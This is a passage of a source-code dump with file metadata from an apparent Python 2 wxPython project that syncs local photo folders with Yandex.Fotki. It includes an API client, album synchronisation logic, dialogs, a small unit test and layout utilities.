ForEachSelected(self, callback, query=None):\r\n selected = self.thumbs.GetSelected()\r\n agreed = not query or wx.MessageBox(query, u'Внимание', wx.OK | wx.CANCEL) == wx.OK\r\n if not (selected and agreed):\r\n return\r\n\r\n @utils.http_handler\r\n @utils.long_time\r\n def processor():\r\n count = len(selected) + 1\r\n pdlg = wx.ProgressDialog(title=u'Выполняем операцию...',\r\n message=u'Выполняем операцию...',\r\n maximum=count,\r\n parent=self)\r\n try:\r\n for idx, photo in enumerate(selected):\r\n pdlg.Update(idx, u'Фотография {}: {}'.format(idx + 1, photo.data.title))\r\n callback(photo)\r\n pdlg.Update(count, u'Обновление альбома')\r\n self.LoadAlbum(self.current_album)\r\n finally:\r\n pdlg.Destroy()\r\n\r\n processor()\r\n\r\n def OpenSmartSyncSettings(self):\r\n item_id = self.albumTree.GetSelection()\r\n album = self.albumTree.GetPyData(item_id)\r\n print album.id\r\n\r\n def CreateAlbumInSelected(self):\r\n item_id, album = self.GetSelectedAlbum()\r\n if album.count:\r\n wx.MessageBox(u'Нельзя создать альбом в непустом альбоме', u'Ошибка', wx.OK | wx.ICON_ERROR)\r\n return\r\n dlg = wx.TextEntryDialog(self, u'Введите название нового альбома',\r\n u'Создаем новый альбом в \"{}\"'.format(album.title))\r\n if dlg.ShowModal() == wx.ID_OK:\r\n new_album = album.create_album(dlg.GetValue())\r\n if not new_album:\r\n return\r\n new_item_id = self.AppendAlbum(item_id, new_album)\r\n self.albumTree.Expand(item_id)\r\n self.albumTree.SelectItem(new_item_id)\r\n self.LoadAlbum(new_item_id, new_album)\r\n dlg.Destroy()\r\n\r\n def DeleteSelectedAlbum(self):\r\n item_id, album = self.GetSelectedAlbum()\r\n if wx.MessageBox(u'Вы действительно хотите удалить альбом \"{}\"?'.format(album.title),\r\n u'Внимание', wx.YES_NO | wx.ICON_WARNING) == wx.YES:\r\n album.delete()\r\n self.albumTree.Delete(item_id)\r\n\r\n def UploadSelectedPhoto(self):\r\n f = lambda p: self.current_album.upload(p.data)\r\n self.ForEachSelected(f, u'Загрузить фотографии?')\r\n"
},
{
"alpha_fraction": 0.43986254930496216,
"alphanum_fraction": 0.5549828410148621,
"avg_line_length": 27.200000762939453,
"blob_id": "400d70370c59a8fcc3cb3647a2464ba8594473a9",
"content_id": "2d28b4db6eef57a0289a57f82abdbb61926f9ed6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 582,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 20,
"path": "/tests.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! -*- coding: utf-8 -*-\r\n\r\nimport unittest\r\nimport utils\r\n\r\n__author__ = 'anton'\r\n\r\nclass Test(unittest.TestCase):\r\n def test_fit(self):\r\n self.assertEquals((10, 10), utils.fit(10, 10, 10, 10))\r\n self.assertEquals((10, 10), utils.fit(10, 10, 10, 10))\r\n self.assertEquals((5, 5), utils.fit(10, 10, 5, 5))\r\n self.assertEquals((10, 5), utils.fit(20, 10, 10, 10))\r\n self.assertEquals((5, 10), utils.fit(10, 20, 10, 10))\r\n self.assertEquals((10, 20), utils.fit(20, 40, 10, 20))\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()"
},
{
"alpha_fraction": 0.5853675007820129,
"alphanum_fraction": 0.5909586548805237,
"avg_line_length": 32.714942932128906,
"blob_id": "f0c20f3c21d62a44fa264d99a9a1bedb60e0bfb8",
"content_id": "10edea2756c702889e7174c0537d33fec1258f52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16960,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 435,
"path": "/lib/models/yafotki.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\n# -*- coding: utf-8 -*-\n\nimport urllib\nimport urllib2\nimport re\nimport json\nimport mimetypes\nimport pprint\nimport datetime\nimport time\nimport yarsa\n\n\nclass YandexError(Exception):\n pass\n\n\nclass YandexService(object):\n def __init__(self, username, password='', token=''):\n \"\"\"\n Инициализировать работу с сервисом Яндекс.Фотки\n @param username: имя пользователя\n @param password: пароль\n @param token: авторизационный токен, может быть указан вместо пароля\n \"\"\"\n self.username = username\n self.password = password\n self.token = token\n\n self.data = {}\n self.albums_href = ''\n self.photos_href = ''\n self.tags_href = ''\n\n def auth(self, strict=True):\n \"\"\"\n Запрос авторизационного токена. Если все прошло удачно,\n то внутри сервиса будет установлен авторизационный токен, иначе\n будет вызвано исключение HTTPError\n \"\"\"\n\n def extract(tag, text):\n match = re.search('<{0}>(.*?)</{0}>'.format(tag), text)\n return match.group(1) if match else ''\n\n # Шаг 1. Получение открытого ключа\n answer = urllib2.urlopen('http://auth.mobile.yandex.ru/yamrsa/key/')\n answer = answer.read()\n # Извлечение данных об открытом ключе\n public_key = extract('key', answer)\n request_id = extract('request_id', answer)\n # Шаг 2. Шифрование данных открытым ключом\n message = '<credentials login=\"{0}\" password=\"{1}\"/>'\n message = message.format(self.username, self.password)\n encoded = yarsa.encode(public_key, message)\n # Шаг 3. Передеча данных на сервер яндекса\n request = urllib2.Request('http://auth.mobile.yandex.ru/yamrsa/token/')\n data = urllib.urlencode({'request_id': request_id, 'credentials': encoded})\n request.add_data(data)\n request.add_header('Content-Length', len(data))\n request.add_header('Content-Type', 'application/x-www-form-urlencoded')\n answer = urllib2.urlopen(request)\n answer = answer.read()\n # Извлекаем токен из ответа сервера\n self.token = extract('token', answer)\n if strict and not self.token:\n raise YandexError('Token is empty')\n\n def request(self, url, data=None, headers=None, code=200, method=None):\n \"\"\"\n Запрос к сервису Яндекс.Фотки\n При ошибках возникнет исключение HTTPError\n @param url: адрес запроса\n @param data: данные, которые будут переданы в теле запроса\n @param headers: дополнительные заголовки\n @param code: ожидаемый код завершения запроса\n @param method: если требуется, можно указать нестандартный метод,\n к примеру PUT\n @return: результат запроса - документ JSON, который парсится и возвращается в\n виде стандартных объектов Python.\n \"\"\"\n request = urllib2.Request(url)\n request.add_header('Accept', 'application/json')\n # проверяем авторизацию\n if self.token:\n request.add_header('Authorization',\n 'FimpToken realm=\"fotki.yandex.ru\", token=\"{0}\"'.format(self.token))\n # Если есть данные, добавляем данные\n if data:\n request.add_data(data)\n request.add_header('Content-Length', len(data))\n # Если есть дополнительные заголовки, то добавляем их\n if headers:\n for h in headers:\n request.add_header(h, headers[h])\n # грязный трюк\n if method:\n request.get_method = lambda: method\n # добавляем дополнительные параметры запроса\n # empty\n # Выполняем запрос\n answer = urllib2.urlopen(request)\n # Проверяем полученный код ответа\n if answer.code != code:\n # N.B. хрен знает, что значит последний параметр fp. Поставил None\n raise urllib2.HTTPError(url, answer.code, 'Bad code', {}, None)\n answer = answer.read()\n return json.loads(answer) if answer else {}\n\n def load(self, username='', password='', token='', strict=True):\n \"\"\"\n Загрузить мета-информацию о профиле пользователя на сервисе.\n Если указать имя пользователя, то будет загружена информация о конкретном пользователе.\n @param username: имя пользователя\n @param password: пароль\n @param token: авторизационный токен, может быть указан вместо пароля\n \"\"\"\n if username:\n self.username = username\n self.password = password\n self.token = token\n if not self.token and self.password:\n self.auth(strict)\n url = 'http://api-fotki.yandex.ru/api/users/{0}/'.format(self.username)\n self.data = self.request(url)\n self.albums_href = self.data['collections']['album-list']['href']\n self.photos_href = self.data['collections']['photo-list']['href']\n self.tags_href = self.data['collections']['tag-list']['href']\n\n def is_auth(self):\n return bool(self.token)\n\n def iter_entries(self, url, scheme, count=None, rlimit=100):\n \"\"\"\n Возвращает итератор по объектам, которые определяются параметром scheme.\n\n @param url: адрес коллекции\n @param scheme: Объект, в который будут преобразованы элементы\n @type count: int\n @param count: количество возвращаемых объектов,\n None - все объекты\n @type rlimit: int\n @param rlimit: количество объектов, возвращаемых в одном запросе,\n но не больше 100 (ограничение Яндекс для постраничной\n выдачи коллекций)\n @rtype: __generator\n \"\"\"\n # проверяем, чтобы максимально в выдаче стояло не больше 100 элементов\n if rlimit > 100:\n rlimit = 100\n # если количество запрашиваемых элементов не больше 100, столько и запросим\n if count and count < 100:\n rlimit = count\n # добавляем параметр лимита в запрос\n next_item = url + ('?' if url.find('?') < 0 else '&') + 'limit={0}'.format(rlimit)\n while next_item:\n data = self.request(next_item)\n for i in data['entries']:\n yield scheme(self, i)\n if count is not None:\n count -= 1\n if count <= 0:\n return\n next_item = data['links'].get('next')\n\n def iter_albums(self, count=None, rlimit=100):\n \"\"\"\n Возвращает итератор по альбомам. Если вы хотите построить иерархию альбомов,\n разумнее воспользоваться методом get_albums для получения сразу всех альбомов.\n @type count: int\n @param count: количество возвращаемых альбомов,\n None - все альбомы\n @type rlimit: int\n @param rlimit: количество альбомов, возвращаемых в одном запросе,\n но не больше 100 (ограничение Яндекс для постраничной\n выдачи коллекций)\n @rtype: __generator of YandexAlbum\n \"\"\"\n return self.iter_entries(self.albums_href, YandexAlbum, count, rlimit)\n\n @property\n def albums(self):\n \"\"\"\n Возвращает все альбомы. Если альбомов очень много, разумнее\n воспользоваться генератором iter_albums.\n @rtype: list of YandexAlbum\n \"\"\"\n return list(self.iter_albums())\n\n def iter_photos(self, count=None, rlimit=100):\n \"\"\"\n @type count: int\n @param count: количество возвращаемых фотографий,\n None - все фотографии\n @type rlimit: int\n @param rlimit: количество фотографий, возвращаемых в одном запросе,\n но не больше 100 (ограничение Яндекс для постраничной\n выдачи коллекций)\n @rtype: __generator of YandexPhoto\n \"\"\"\n return self.iter_entries(self.photos_href, YandexPhoto, count, rlimit)\n\n @property\n def photos(self):\n \"\"\"\n Возвращает все фотографии. Если фотографий очень много, разумнее\n воспользоваться генератором iter_photos.\n @rtype: list of YandexPhoto\n \"\"\"\n return list(self.iter_photos())\n\n def iter_tags(self, count=None, rlimit=100):\n return self.iter_entries(self.tags_href, YandexTag, count, rlimit)\n\n def create_album(self, title, summary=None, parent=None):\n \"\"\"\n Создать новый альбом\n @param title: Название\n @param summary: Описание\n @type parent: YandexAlbum\n @param parent: Родительский альбом\n @return: Новый созданный альбом\n \"\"\"\n data = {'title': title}\n if summary:\n data['summary'] = summary\n if parent:\n data['links'] = {'album': parent.link_self}\n headers = {'Content-Type': 'application/json; type=entry'}\n answer = self.request(self.albums_href, json.dumps(data), headers, code=201)\n return YandexAlbum(self, answer)\n\n def __str__(self):\n return pprint.pformat(self.data)\n\n @property\n def id(self):\n \"\"\"Уникальный идентификатор сущности\"\"\"\n return None\n\n @property\n def link_self(self):\n return None\n\n\nclass YandexEntry(object):\n def __init__(self, service, data):\n \"\"\"\n @type service: YandexService\n @type data: dict\n @param data: словарь параметров сущности\n \"\"\"\n self.service = service\n self.data = data\n\n @staticmethod\n def convert_time(ts, tz=True):\n if not ts:\n return None\n dt = datetime.datetime.strptime(ts, '%Y-%m-%dT%H:%M:%SZ')\n if tz:\n dt = dt - datetime.timedelta(seconds=time.timezone)\n return dt\n\n @property\n def id(self):\n \"\"\"Уникальный идентификатор сущности\"\"\"\n return self.data['id']\n\n @property\n def title(self):\n \"\"\"Заголовок сущности\"\"\"\n return self.data.get('title', '')\n\n def link(self, name='self'):\n return self.data['links'].get(name)\n\n @property\n def link_self(self):\n return self.link('self')\n\n @property\n def link_edit(self):\n return self.link('edit')\n\n @property\n def link_parent(self):\n return self.link('album')\n\n @property\n def link_alt(self):\n return self.link('alternate')\n\n @property\n def created(self):\n return self.convert_time(self.data.get('created'), False)\n\n @property\n def edited(self):\n return self.convert_time(self.data.get('edited'))\n\n @property\n def published(self):\n return self.convert_time(self.data.get('published'))\n\n def update(self):\n self.data = self.service.request(self.link_self)\n\n def edit(self, upd_data):\n data = self.service.request(self.link_edit)\n data.update(upd_data)\n data = json.dumps(data)\n headers = {'Content-Type': 'application/json; type=entry'}\n self.data = self.service.request(self.link_self, data, headers, method='PUT')\n\n def delete(self):\n self.service.request(self.link_self, code=204, method='DELETE')\n\n # def __str__(self):\n # return pprint.pformat(self.data)\n\n def __eq__(self, other):\n return self.id == other.id\n\n\nclass YandexAlbum(YandexEntry):\n @property\n def link_photos(self):\n return self.link('photos')\n\n @property\n def photos(self):\n return list(self.iter_photos())\n\n @property\n def count(self):\n return self.data.get('imageCount', 0)\n\n def upload(self, filename):\n # При загрузке данных надо обернуть все в bytearray, иначе происходит ошибка Unicode\n # чертовы строки в python\n # http://bugs.python.org/issue12398\n data = bytearray(open(filename, 'rb').read())\n mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'\n headers = {'Content-Type': mimetype}\n answer = self.service.request(self.link_photos, data, headers, code=201)\n photo = YandexPhoto(self.service, answer)\n return photo\n\n def edit(self, title=None, summary=None, parent=None):\n data = {}\n if title is not None:\n data['title'] = title\n if summary is not None:\n data['summary'] = summary\n if parent is not None:\n data['links'] = {'album': parent.get_link()}\n YandexEntry.edit(self, data)\n\n def iter_photos(self, count=None, rlimit=100):\n return self.service.iter_entries(self.link_photos, YandexPhoto, count, rlimit)\n\n def create_album(self, title, summary=None):\n return self.service.create_album(title, summary, self)\n\n\nclass YandexPhoto(YandexEntry):\n def __init__(self, service, data):\n YandexEntry.__init__(self, service, data)\n imgs = self.data['img']\n self.images = sorted([YandexImage(self, name, imgs[name]) for name in imgs],\n key=lambda x: x.w)\n\n def image(self, name):\n return next((x for x in self.images if x.name == name), None)\n\n def edit(self, title=None, summary=None, xxx=None,\n disable_comments=None, hide_original=None, access=None):\n data = {}\n if title is not None:\n data['title'] = title\n if summary is not None:\n data['summary'] = summary\n if xxx is not None:\n data['xxx'] = bool(xxx)\n if disable_comments is not None:\n data['disableComments'] = bool(disable_comments)\n if hide_original is not None:\n data['hideOriginal'] = bool(hide_original)\n if access is not None:\n data['access'] = access\n YandexEntry.edit(self, data)\n\n @property\n def tags(self):\n return self.data.get('tags', {})\n\n\nclass YandexImage(object):\n def __init__(self, photo, name, data):\n self.photo = photo\n self.name = name\n self.w = data['width']\n self.h = data['height']\n self.size = data.get('bytesize')\n self.href = data['href']\n\n def download(self):\n return urllib2.urlopen(self.href).read()\n\n def __repr__(self):\n return '<{} {}x{}>'.format(self.name, self.w, self.h)\n\n\nclass YandexTag(object):\n def __init__(self, data):\n self.data = data\n\n def __str__(self):\n return pprint.pformat(self.data)\n\n\nif __name__ == '__main__':\n try:\n s = YandexService(None)\n s.load()\n print 'Token', s.token\n ph = next(s.iter_photos())\n pprint.pprint(ph.data)\n # for t in s.iter_tags():\n # print t\n\n except urllib2.HTTPError as ex:\n print ex\n"
},
{
"alpha_fraction": 0.5976352691650391,
"alphanum_fraction": 0.6076675057411194,
"avg_line_length": 36.76388931274414,
"blob_id": "471cdabac4614802e4b04368e21af8700c203392",
"content_id": "75c704a7555a10a8c83287431806da4f4c52f828",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2864,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 72,
"path": "/lib/forms/syncfrm.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! coding: utf-8\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\nimport wx\r\n\r\n\r\nclass SyncSettingsDialog(wx.Dialog):\r\n def __init__(self, alb, parent=None):\r\n wx.Dialog.__init__(self, parent, title=u'Настройки альбома')\r\n\r\n self.album = alb\r\n \"\"\"@type : PhotoAlbum\"\"\"\r\n\r\n self.sync_checkbox = wx.CheckBox(self, wx.NewId(), u'Включить синхронизацию')\r\n self.sync_checkbox.SetValue(bool(self.album.sync))\r\n self.folder_input = wx.TextCtrl(self, wx.NewId(), unicode(self.album.folder or ''))\r\n self.folder_btn = wx.Button(self, wx.NewId(), u'...', size=(25, -1))\r\n self.pattern_input = wx.TextCtrl(self, wx.NewId(), unicode(self.album.pattern or ''))\r\n self.deep_input = wx.TextCtrl(self, wx.NewId(), unicode(self.album.deep or 1))\r\n\r\n folder_sizer = wx.BoxSizer()\r\n folder_sizer.Add(self.folder_input, 1, wx.EXPAND | wx.ALL)\r\n folder_sizer.Add(self.folder_btn, 0, wx.LEFT, 5)\r\n\r\n input_sizer = wx.FlexGridSizer(4, 2, 5, 10)\r\n input_sizer.AddGrowableCol(1)\r\n input_sizer.Add(wx.StaticText(self, wx.NewId(), u'Директория'))\r\n input_sizer.AddSizer(folder_sizer, 1, wx.EXPAND | wx.ALL)\r\n input_sizer.Add(wx.StaticText(self, wx.NewId(), u'Шаблон'))\r\n input_sizer.Add(self.pattern_input, 1, wx.EXPAND | wx.ALL)\r\n input_sizer.Add(wx.StaticText(self, wx.NewId(), u'Глубина синхронизации'))\r\n input_sizer.Add(self.deep_input, 1, wx.EXPAND | wx.ALL)\r\n input_sizer.AddStretchSpacer()\r\n input_sizer.Add(self.sync_checkbox, 1, wx.EXPAND | wx.ALL)\r\n\r\n btn_sizer = self.CreateStdDialogButtonSizer(wx.OK | wx.CANCEL)\r\n\r\n main_sizer = wx.BoxSizer(wx.VERTICAL)\r\n main_sizer.AddSizer(input_sizer, 1, wx.EXPAND | wx.ALL, 15)\r\n main_sizer.AddSizer(btn_sizer, 0, wx.EXPAND | wx.ALL | wx.TOP, 15)\r\n\r\n self.SetSizer(main_sizer)\r\n self.Fit()\r\n self.SetSize((520, -1))\r\n\r\n self.folder_btn.Bind(wx.EVT_BUTTON, self.OnSelectFolder)\r\n\r\n def GetFolder(self):\r\n return self.folder_input.GetValue()\r\n\r\n def GetPattern(self):\r\n return self.pattern_input.GetValue()\r\n\r\n def GetDeep(self):\r\n return self.deep_input.GetValue()\r\n\r\n def IsSync(self):\r\n return self.sync_checkbox.GetValue()\r\n\r\n def OnSelectFolder(self, event):\r\n dir_dlg = wx.DirDialog(self)\r\n if dir_dlg.ShowModal() == wx.ID_OK:\r\n self.folder_input.SetValue(dir_dlg.GetPath())\r\n\r\n def Run(self):\r\n if self.ShowModal() == wx.ID_OK:\r\n self.album.sync = self.sync_checkbox.GetValue()\r\n self.album.folder = self.folder_input.GetValue()\r\n self.album.pattern = self.pattern_input.GetValue()\r\n self.album.deep = int(self.deep_input.GetValue())\r\n"
},
{
"alpha_fraction": 0.5687164068222046,
"alphanum_fraction": 0.5715641975402832,
"avg_line_length": 32.22743606567383,
"blob_id": "f6a0edc2485e529e82b12ab9d23027d0f2010895",
"content_id": "391b127071d888d666fa2a4db981c22f6a199b76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9946,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 277,
"path": "/lib/models/album.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! -*- coding: utf-8 -*-\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\nimport os\r\nimport yafotki\r\nimport photo\r\nfrom lib.extra import utils\r\n\r\n\r\nclass AlbumError(Exception):\r\n pass\r\n\r\n\r\nclass Album(object):\r\n def __init__(self):\r\n self.parent = None\r\n self.children = []\r\n\r\n @property\r\n def id(self):\r\n return None\r\n\r\n @property\r\n def count(self):\r\n return None\r\n\r\n @property\r\n def link_self(self):\r\n return None\r\n\r\n def is_web(self):\r\n return True\r\n\r\n def append_child(self, album):\r\n album.parent = self\r\n self.children.append(album)\r\n\r\n\r\nclass ServiceAlbum(Album):\r\n def __init__(self, yandex_service, settings):\r\n \"\"\"\r\n @type yandex_service: yafotki.YandexService\r\n \"\"\"\r\n Album.__init__(self)\r\n self.service = yandex_service\r\n self.settings = settings\r\n self._build_album_tree(self.service.albums, settings, self, 0, '')\r\n\r\n @property\r\n def title(self):\r\n return u'Все фотографии'\r\n\r\n @property\r\n def link_self(self):\r\n return self.service.link_self\r\n\r\n def get_photos(self, progress):\r\n map_f = lambda x: photo.MatchedPhoto(remote=x)\r\n msg_f = lambda index, item: u'Фотография: {}'.format(item.title)\r\n return list(progress.map(map_f, self.service.iter_photos(100), title=u'Загружаем фотографии', message=msg_f))\r\n\r\n def create_album(self, title, summary=None):\r\n new_yandex_album = self.service.create_album(title, summary)\r\n new_photo_album = PhotoAlbum(new_yandex_album)\r\n self.append_child(new_photo_album)\r\n return new_photo_album\r\n\r\n @staticmethod\r\n def _build_album_tree(yaalbums, settings, current, level, pattern):\r\n \"\"\"\r\n Построить дерево альбомов на основе альбомов на сервисе с учетом альбомов,\r\n которые необходимо синхронизировать.\r\n Это очень важная функция! Она синхронизирует иерархию альбомов.\r\n @type yaalbums: list of YandexAlbum\r\n @type settings: dict\r\n @type current: ServiceAlbum|PhotoAlbum\r\n @type level: int\r\n @type pattern: basestring\r\n \"\"\"\r\n f = lambda i: i.link_parent == current.link_self if current.is_web() else False\r\n web_albums = [PhotoAlbum(i, settings.get(i.id, {})) for i in yaalbums if f(i)]\r\n local_albums = []\r\n\r\n if isinstance(current, PhotoAlbum):\r\n # если есть собственные настройки синхронизации\r\n if current.sync:\r\n level = current.deep\r\n pattern = current.pattern\r\n # да, синхронизоровать надо\r\n if current.folder and pattern and level > 0:\r\n for folder_name in os.listdir(current.folder):\r\n folder_path = os.path.join(current.folder, folder_name)\r\n if not os.path.isdir(folder_path):\r\n continue\r\n if not utils.check_files(folder_path, pattern):\r\n continue\r\n try:\r\n web_album = next((i for i in web_albums if i.title == folder_name))\r\n web_album.folder = folder_path\r\n web_album.pattern = pattern\r\n except StopIteration:\r\n local_album = PhotoAlbum(None)\r\n local_album.folder = folder_path\r\n local_album.pattern = pattern\r\n local_albums.append(local_album)\r\n\r\n for album in web_albums + local_albums:\r\n new_level = level - 1 if level > 0 else 0\r\n ServiceAlbum._build_album_tree(yaalbums, settings, album, new_level, pattern)\r\n current.append_child(album)\r\n\r\n\r\nclass PhotoAlbum(Album):\r\n\r\n def __init__(self, yaalbum, settings=None):\r\n \"\"\"\r\n @type album: yafotki.YandexAlbum|None\r\n @type settings: dict|None\r\n \"\"\"\r\n Album.__init__(self)\r\n self.yaalbum = yaalbum\r\n \"\"\"@type : yafotki.YandexAlbum|None\"\"\"\r\n # settings\r\n self.folder = None\r\n self.sync = False\r\n self.pattern = None\r\n self.deep = 0\r\n # apply settings\r\n if settings:\r\n self.set_settings(settings)\r\n self.remote_photos = None\r\n self.local_photos = None\r\n\r\n def is_web(self):\r\n return bool(self.yaalbum)\r\n\r\n def is_local(self):\r\n return bool(self.folder)\r\n\r\n def is_matched(self):\r\n return self.is_web() and self.is_local()\r\n\r\n def is_synced(self):\r\n return self.sync\r\n\r\n def is_edited(self):\r\n if not self.is_matched():\r\n return False\r\n remote_mtime = self.yaalbum.published\r\n local_mtime = utils.get_mtime(self.folder, self.pattern)\r\n return local_mtime > remote_mtime\r\n\r\n @property\r\n def id(self):\r\n return self.yaalbum.id if self.yaalbum else self.folder\r\n\r\n @property\r\n def title(self):\r\n if self.yaalbum:\r\n return self.yaalbum.title\r\n if self.folder:\r\n return os.path.split(self.folder)[1]\r\n return ''\r\n\r\n @property\r\n def link_self(self):\r\n return self.yaalbum.link_self\r\n\r\n def count_local(self):\r\n if self.folder and self.pattern:\r\n return utils.count_files(self.folder, self.pattern)\r\n return 0\r\n\r\n def count_remote(self):\r\n return self.yaalbum.count if self.yaalbum else 0\r\n\r\n def set_settings(self, settings):\r\n self.sync = settings.get('sync', False)\r\n self.folder = settings.get('folder')\r\n self.pattern = settings.get('pattern')\r\n self.deep = settings.get('deep', 0)\r\n\r\n def get_settings(self):\r\n return {\r\n 'sync': self.sync,\r\n 'folder': self.folder,\r\n 'pattern': self.pattern,\r\n 'deep': self.deep,\r\n }\r\n\r\n def refresh(self, progress):\r\n f = lambda: [photo.MatchedPhoto(remote=yaphoto) for yaphoto in self.yaalbum.photos] if self.yaalbum else []\r\n web_photos = progress.do(f, title=u'Загрузка альбома')\r\n\r\n local_paths = []\r\n if self.folder and self.pattern:\r\n local_paths = list(utils.find_files(self.folder, self.pattern))\r\n\r\n map_f = lambda x: photo.MatchedPhoto(local=x)\r\n msg_f = lambda index, item: u'Файл: {}'.format(item)\r\n local_photos = list(progress.map(map_f, local_paths, title=u'Загружаем файлы', message=msg_f))\r\n\r\n if web_photos and local_photos:\r\n non_sync = []\r\n msg_f = lambda index, item: u'Файл: {}'.format(item.title)\r\n for local_photo in progress.wrap(local_photos, title=u'Ищем соответствия', message=msg_f):\r\n f = lambda web_photo: web_photo.similar_to(local_photo)\r\n most_proper = min(web_photos, key=f)\r\n if most_proper.similar_to(local_photo) <= 10.0:\r\n most_proper.assign_local(local_photo)\r\n else:\r\n non_sync.append(local_photo)\r\n local_photos = non_sync\r\n\r\n self.local_photos = local_photos\r\n self.remote_photos = web_photos\r\n\r\n def get_remote_photos(self, progress):\r\n if self.remote_photos is None:\r\n self.refresh(progress)\r\n return self.remote_photos\r\n\r\n def get_local_photos(self, progress):\r\n if self.local_photos is None:\r\n self.refresh(progress)\r\n return self.local_photos\r\n\r\n def get_photos(self, progress):\r\n return self.get_remote_photos(progress) + self.get_local_photos(progress)\r\n\r\n def create_album(self, title, summary=None):\r\n \"\"\"@rtype : PhotoAlbum\"\"\"\r\n if not self.yaalbum:\r\n raise AlbumError(u'Нет Yandex-альбома')\r\n if self.yaalbum.count:\r\n raise AlbumError(u'Нельзя создать альбом в непустом альбоме')\r\n new_yandex_album = self.yaalbum.create_album(title, summary)\r\n new_photo_album = PhotoAlbum(new_yandex_album)\r\n self.append_child(new_photo_album)\r\n return new_photo_album\r\n\r\n def delete(self, progress):\r\n if not self.yaalbum:\r\n raise AlbumError(u'Нет Yandex-альбома')\r\n self.yaalbum.delete()\r\n self.yaalbum = None\r\n self.refresh(progress)\r\n\r\n def upload(self, matched_photo):\r\n \"\"\"\r\n Загружает фотографию в альбом. Фотография должна быть локальной\r\n @type photo: photo.MatchedPhoto\r\n @raise AlbumError\r\n \"\"\"\r\n if not self.yaalbum:\r\n raise AlbumError(u'Нет Yandex-альбома')\r\n if not matched_photo.is_local(strict=True):\r\n raise AlbumError(u'Это не локальный файл')\r\n path = matched_photo.data.get_path()\r\n yaphoto = self.yaalbum.upload(path)\r\n yaphoto.edit(access='public')\r\n print 'published', yaphoto.published\r\n print 'edited ', yaphoto.edited\r\n # matched_photo.web = yaphoto\r\n\r\n def synchronize(self, progress):\r\n if not self.is_matched() and self.parent:\r\n new_album = self.parent.create_album(self.title)\r\n self.yaalbum = new_album.yaalbum\r\n self.refresh(progress)\r\n local_photos = self.get_local_photos(progress)\r\n msg_f = lambda i, x: u'{} ({} MB)'.format(x.title, round(x.size / 1024.0 / 1024.0))\r\n for ph in progress.wrap(local_photos, title=u'Загружаем фотографии', message=msg_f):\r\n self.upload(ph)\r\n self.refresh(progress)\r\n"
},
{
"alpha_fraction": 0.6228593587875366,
"alphanum_fraction": 0.6272703409194946,
"avg_line_length": 28.646154403686523,
"blob_id": "61703d5efcbcdfddfbe328be87eb10c011682c29",
"content_id": "965ff2164e284fb35190b41d9fac89b824833939",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9625,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 260,
"path": "/lib/extra/utils.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\n#! coding: utf-8\n\nimport os\nimport json\nimport urllib2\nimport wx\nimport re\nimport itertools\nimport cProfile\nimport pstats\nimport StringIO\nimport datetime\n\n\ndef load_file(filename, default=None):\n data = default or {}\n if os.path.exists(filename):\n with open(filename, 'r') as f:\n new_settings = json.load(f)\n data.update(new_settings)\n return data\n\n\ndef save_file(filename, data):\n with open(filename, 'w') as f:\n json.dump(data, f, indent=2)\n\n\ndef calc_width(rels, height, border):\n \"\"\"\n Рассчитать общую ширину полосы фотографий при данных высоте\n и границах (справа и слева) рамки\n @param rels: набор отношений ширины к высоты для каждой картинки\n @param height: высота полосы\n @param border: ширина рамки для каждой картинки\n @return: рассчитанная ширина полосы\n \"\"\"\n return sum([height * r + 2 * border for r in rels])\n\n\ndef calc_height(rels, width, border):\n \"\"\"\n Рассчитать оптимальную высоту для полосы фотографий так,\n чтобы все фотографии влезли в полосу, сохранив пропорции\n каждой фотографии.\n\n Использует метод бинарного поиска.\n\n Огромное спасибо Данилову Александру и Бутину Кириллу\n за подсказку алгоритма нахождения оптимальной высоты\n\n @param rels: набор отношений ширины к высоты для каждой картинки\n @param width: ширина полосы\n @param border: ширина рамки для каждой картинки\n @return: оптимальная высота полосы\n \"\"\"\n low = 0.0\n high = 65536.0 # max resolution\n while high - low > 0.1:\n middle = (high + low) / 2\n if calc_width(rels, middle, border) < width:\n low = middle\n else:\n high = middle\n return (high + low) / 2\n\n\ndef calc_frames(rels, stripe_width, stripe_border, stripe_height):\n \"\"\"\n На основе переданных отношений изображений вычисляет оптимальные\n параметры ширины и высоты, чтобы разместить их в полосу.\n \"\"\"\n do_check = True\n\n # вычисляем высоту для полосы\n # у всех изображений высота будет одинаковая\n height = int(round(calc_height(rels, stripe_width, stripe_border)))\n\n # если полученая высота больше максимально допустимой,\n # то ее придется уменьшить (от этого уменьшится и ширина полосы)\n if height >= stripe_height:\n height = stripe_height\n do_check = False\n\n # вычисляем разрешения изображений\n dims = [(int(round(height * r)), height) for r in rels]\n\n # выполняем проверку\n # иногда при расчетах новой ширины для изображений, их суммарная ширина\n # может на несколько точек отличатсья от ширины полосы;\n # поэтому корректируем последнее изображение в полосе,\n # растягивая или сжимая его\n if do_check:\n # контрольная сумма\n check_width = sum([w + 2 * stripe_border for w, h in dims])\n # разница ширины в точках\n delta = stripe_width - check_width\n # получаем размеры последнего изображения\n w, h = dims[-1]\n # изменяем размеры последнего изображения\n dims[-1] = w + delta, h\n\n return dims\n\n\ndef render_template(template, remote_photo, w, h):\n \"\"\"\n Заполнить указанный шаблон. Плейсхолдеры в шаблоне имеют следующий формат: 